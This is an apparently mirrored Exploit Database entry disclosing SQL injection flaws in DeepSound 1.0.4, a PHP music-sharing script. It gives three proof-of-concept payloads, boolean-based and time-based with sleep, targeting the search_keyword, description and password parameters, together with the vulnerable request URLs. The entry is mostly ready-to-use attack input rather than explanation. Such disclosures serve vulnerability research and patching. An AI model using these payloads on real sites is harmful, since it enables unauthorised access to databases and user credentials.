DeepSound 1.0.4 – SQL Injection

• Exploit Database
• 30 阅读

• 作者： Mehmet EMIROGLU
  日期： 2019-05-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46852/

• ===========================================================================================
  # Exploit Title: DeepSound 1.0.4 - SQL Inj.
  # Dork: N/A
  # Date: 15-05-2019
  # Exploit Author: Mehmet EMIROGLU
  # Vendor Homepage:
  https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
  # Version: v1.0.4
  # Category: Webapps
  # Tested on: Wamp64, Windows
  # CVE: N/A
  # Software Description: DeepSound is a music sharing script, DeepSound is
  the best way to start your own music website!
  ===========================================================================================
  # POC - SQLi
  # Parameters : search_keyword
  # Attack Pattern : %27 aNd 9521793=9521793 aNd %276199%27=%276199
  # POST Method :
  http://localhost/Script/search/songs/style?filter_type=songs&filter_search_keyword=style&search_keyword=style[SQL
  Inject Here]
  ===========================================================================================
  ###########################################################################################
  ===========================================================================================
  # Exploit Title: DeepSound 1.0.4 - SQL Inj.
  # Dork: N/A
  # Date: 15-05-2019
  # Exploit Author: Mehmet EMIROGLU
  # Vendor Homepage:
  https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
  # Version: v1.0.4
  # Category: Webapps
  # Tested on: Wamp64, Windows
  # CVE: N/A
  # Software Description: DeepSound is a music sharing script, DeepSound is
  the best way to start your own music website!
  ===========================================================================================
  # POC - SQLi
  # Parameters : description
  # Attack Pattern : %27) aNd if(length(0x454d49524f474c55)>1,sleep(3),0)
  --%20
  # POST Method : http://localhost/Script/admin?id=&description=[TEXT
  INPUT]2350265[SQL Inject Here]
  ===========================================================================================
  ###########################################################################################
  ===========================================================================================
  # Exploit Title: DeepSound 1.0.4 - SQL Inj.
  # Dork: N/A
  # Date: 15-05-2019
  # Exploit Author: Mehmet EMIROGLU
  # Vendor Homepage:
  https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
  # Version: v1.0.4
  # Category: Webapps
  # Tested on: Wamp64, Windows
  # CVE: N/A
  # Software Description: DeepSound is a music sharing script, DeepSound is
  the best way to start your own music website!
  ===========================================================================================
  # POC - SQLi
  # Parameters : password
  # Attack Pattern : %22) aNd 7595147=7595147 aNd (%226199%22)=(%226199
  # POST Method :
  http://localhost/Script/search/songs/general?username=4929700&password=2802530[SQL
  Inject Here]
  ===========================================================================================
  ###########################################################################################